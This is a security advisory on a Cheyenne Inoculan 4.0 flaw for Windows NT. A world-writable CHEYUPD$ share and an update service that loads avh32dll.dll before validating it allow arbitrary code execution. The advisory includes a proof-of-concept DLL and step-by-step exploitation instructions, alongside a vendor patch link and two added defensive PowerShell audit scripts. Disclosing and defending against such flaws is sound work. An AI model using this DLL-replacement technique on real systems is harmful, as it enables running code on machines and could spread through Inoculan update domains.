COMMAND
Cheyenne Inoculan
SYSTEMS AFFECTED
Win NT
PROBLEM
Paul Boyer found the following. It is possible to run arbitrary code
on any Intel machine running Cheyenne Inoculan version 4.0 for
Windows NT (any version of NT) prior to SP2. The same kind of
vulnerability might exist in other anti-virus products that
provide an auto-update mechanism.
To check whether you are vulnerable: if you have the Resource Kit
installed, run SRVCHECK.EXE \\<YourMachine>; otherwise run srvmgr.exe
from an NT server in the same domain, select <YourMachine> and
choose "Computer|Shared Directories". If there is a shared
directory called "CHEYUPD$" that allows "FULL CONTROL" to the
"EVERYONE" group, that's bad news.
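The same check, scripted, as an added example that is not part of the advisory and not Cheyenne/CAI code. It assumes a Windows version that ships the SmbShare module (Windows 8 / Server 2012 or later), so it is the modern equivalent of the srvmgr.exe procedure rather than something you could run on NT 4 itself. It reports whether a CHEYUPD$ share exists, whether its share-level ACL contains the Everyone/Full entry the advisory describes, and which broad groups can write to the ...\English\NtIntel\Ready\ directory underneath it, since that NTFS ACL decides who can actually drop files there. The $ShareName parameter is this script's own.

```powershell
# Added example, not from the advisory: audit this host for the CHEYUPD$
# share and report whether the Everyone group holds Full control on it.
# Requires the SmbShare module (Windows 8 / Server 2012 or later).
param(
    [string]$ShareName = 'CHEYUPD$'   # the hidden share named in the advisory
)

$share = Get-SmbShare -Name $ShareName -ErrorAction SilentlyContinue
if (-not $share) {
    Write-Output "Share $ShareName is not present on $env:COMPUTERNAME."
    return
}
Write-Output "Share $ShareName is present on $env:COMPUTERNAME, local path: $($share.Path)"

# Share-level ACL: the condition the advisory calls "bad news" is an
# Allow entry that grants Everyone the Full access right.
$shareAcl = Get-SmbShareAccess -Name $ShareName
$everyoneFull = $shareAcl | Where-Object {
    $_.AccountName -match '(^|\\)Everyone$' -and
    $_.AccessControlType -eq 'Allow' -and
    $_.AccessRight -eq 'Full'
}
if ($everyoneFull) {
    Write-Warning "$ShareName grants Everyone Full control at the share level."
} else {
    Write-Output "No Everyone:Full entry on the share ACL of $ShareName."
}
$shareAcl | Format-Table AccountName, AccessControlType, AccessRight -AutoSize

# The share ACL is only half of the picture: whoever can write to the
# underlying ...\Ready\ directory can stage an update, so list NTFS
# entries that give broad groups write access as well.
$readyDir = Join-Path $share.Path 'English\NtIntel\Ready'
if (Test-Path $readyDir) {
    Write-Output "Write-capable NTFS entries for broad groups on $readyDir :"
    (Get-Acl -Path $readyDir).Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference -match 'Everyone|Users|Authenticated Users' -and
            $_.FileSystemRights -match 'Write|Modify|FullControl'
        } |
        Format-Table IdentityReference, FileSystemRights -AutoSize
} else {
    Write-Output "Directory $readyDir does not exist under the share."
}
```

To audit other machines, the Get-SmbShare and Get-SmbShareAccess calls accept a -CimSession argument; the NTFS part uses Get-Acl against the share's local path and so only runs on the host itself. An empty NTFS table does not prove the directory is safe (generic or inherited rights can show up as numeric values the pattern does not match), so treat the output as a prompt to inspect the ACL, not as a clean bill of health.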
Inoculan runs as a service called "Cheyenne InocuLAN Anti-Virus
Server". When it starts, it replaces any shared directory with the
same name and shares "CHEYUPD$" with full control for the
Everyone group. When the service starts, it does an update check
in this directory (usually "C:\Inoculan\Update\") using the files
"<NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt" and
[idem]...\avh32dll.dll.
Simply "touching" or modifying the file "filelist.txt" so that it
looks newer than it really is causes the update. The update causes
the service to stop, the avh32dll.dll DLL to replace the existing one
(usually c:\inoculan\avh32dll.dll), and then starts the service
again. When the service starts, it loads the DLL into memory, and
only THEN does a lot of work (including checking whether it is a
valid DLL). The problem is that a DLL can execute arbitrary code at
the moment it is loaded into memory, precisely when DllMain is called
by the image loader, before any other function has a chance to be
called... Example (inoctroj.cpp):
#include <stdio.h>
#include <string.h>
// DllMain is the entry point the image loader calls on load.
// The advisory uses plain integer types instead of windows.h's
// BOOL WINAPI DllMain(HINSTANCE, DWORD, LPVOID); they have the same
// size and calling convention on 32-bit Windows.
long __stdcall DllMain (long, unsigned long, void*)
{
    // Any code can go here. This is an example:
    // all it does is create a file in the root of the C: drive
    // and write "hello world !" into it.
    FILE * demo;
    // create the file
    demo = fopen ( "C:\\I_can_write_a_file.txt", "w");
    if (demo == NULL)
        return 0;
    // write to the file
    const char * buf = "hello world ! ";
    fwrite ( buf, 1, strlen(buf), demo);
    fclose ( demo );
    // Returning 0 aborts the DLL loading. Anyway, we're done at that time ;))
    return 0;
}
Compile and link it to produce the target avh32dll.dll.
Write it to <NtBox>\CHEYUPD$\English\NtIntel\Ready\.
Touch <NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt in the
same directory so that it is more recent than it was initially.
Stop the "Cheyenne InocuLAN Anti-Virus Server" service on the <NtBox>
machine and start it again (alternatively, shut down and restart the
machine). There you are: there is a file "I_can_write_a_file.txt"
in "C:\" on <NtBox>.
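A baseline-and-compare script a defender could run against the update staging directory, added here as an example; it is not from the advisory and not Cheyenne/CAI code. It records the SHA-256 hash, size and last-write time of filelist.txt and avh32dll.dll in ...\Ready\ and, on later runs, reports exactly the two changes the update trigger described above depends on: filelist.txt acquiring a newer timestamp, and avh32dll.dll changing content. The directory and file names are the advisory's; the baseline file location, the -Record switch and the Get-UpdateDirState function are this example's own assumptions, and Get-FileHash needs PowerShell 4 or later.

```powershell
# Added example, not from the advisory: baseline the Inoculan update
# staging directory and report the changes that would trigger an update.
param(
    # Local path of the share's Ready directory (advisory's usual location).
    [string]$ReadyDir = 'C:\Inoculan\Update\English\NtIntel\Ready',
    # Where the baseline is stored; an assumption of this example.
    [string]$Baseline = (Join-Path $env:ProgramData 'cheyupd-baseline.json'),
    # Force a fresh baseline (use after a legitimate update).
    [switch]$Record
)

# The two files the service consults, as named in the advisory.
$Watched = 'filelist.txt', 'avh32dll.dll'

# Collect hash, size and last-write time for each watched file.
function Get-UpdateDirState([string]$Dir) {
    $state = @{}
    foreach ($name in $Watched) {
        $file = Join-Path $Dir $name
        if (Test-Path $file) {
            $item = Get-Item $file
            $state[$name] = @{
                LastWriteTimeUtc = $item.LastWriteTimeUtc.ToString('o')
                Length           = $item.Length
                Sha256           = (Get-FileHash -Path $file -Algorithm SHA256).Hash
            }
        } else {
            $state[$name] = $null
        }
    }
    return $state
}

$current = Get-UpdateDirState $ReadyDir

# First run, or explicit -Record: just write the baseline and stop.
if ($Record -or -not (Test-Path $Baseline)) {
    $current | ConvertTo-Json -Depth 3 | Set-Content -Path $Baseline
    Write-Output "Baseline for $ReadyDir written to $Baseline"
    return
}

$saved = Get-Content -Path $Baseline -Raw | ConvertFrom-Json
$findings = 0

foreach ($name in $Watched) {
    $old = $saved.$name
    $new = $current[$name]

    # A file appearing or vanishing is itself worth a look.
    if (($null -eq $old) -or ($null -eq $new)) {
        if (($null -eq $old) -ne ($null -eq $new)) {
            Write-Warning "$name was added or removed since the baseline."
            $findings++
        }
        continue
    }

    # avh32dll.dll being swapped shows up here, whatever its timestamp says.
    if ($new.Sha256 -ne $old.Sha256) {
        Write-Warning "$name content changed (baseline $($old.Sha256), now $($new.Sha256), size $($old.Length) -> $($new.Length))."
        $findings++
    }

    # The "touch" on filelist.txt shows up as a timestamp moving forward.
    if ([datetime]$new.LastWriteTimeUtc -gt [datetime]$old.LastWriteTimeUtc) {
        Write-Warning "$name timestamp moved forward: $($old.LastWriteTimeUtc) -> $($new.LastWriteTimeUtc)"
        $findings++
    }
}

if ($findings -eq 0) {
    Write-Output "No changes to $($Watched -join ', ') in $ReadyDir since baseline."
}
```

Run it once with -Record after each legitimate update, then on a schedule. A genuine vendor update trips the same checks, which is the point: any change to these two files, expected or not, deserves a look before the service is next restarted, because the advisory shows the service will load whatever avh32dll.dll it finds there before validating it.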
An interesting point is that Inoculan uses "domains": in one
domain, a single server forwards the updates to all machines
participating in that "domain" (nothing to do with NT domains).
THIS WAS NOT TESTED, but one would expect a much worse scenario if
the trojan were written to the Inoculan domain server's CHEYUPD$
shared directory: the trojan would be copied to all machines of that
domain. This is serious, because all of those machines would then be
running arbitrary code in place of the anti-virus program.
SOLUTION
There is an InocuLAN for Windows NT Security Patch. This patch
addresses possible security concerns regarding the CHEYUPD$ hidden
share. It can be applied to builds 269 and 270 (Service Pack
1 level) or build 373 (Service Pack 2A level). Get it at:
http://www.cai.com/cheyenne/CheyTech/techbases/ilnt/cheyupd$.html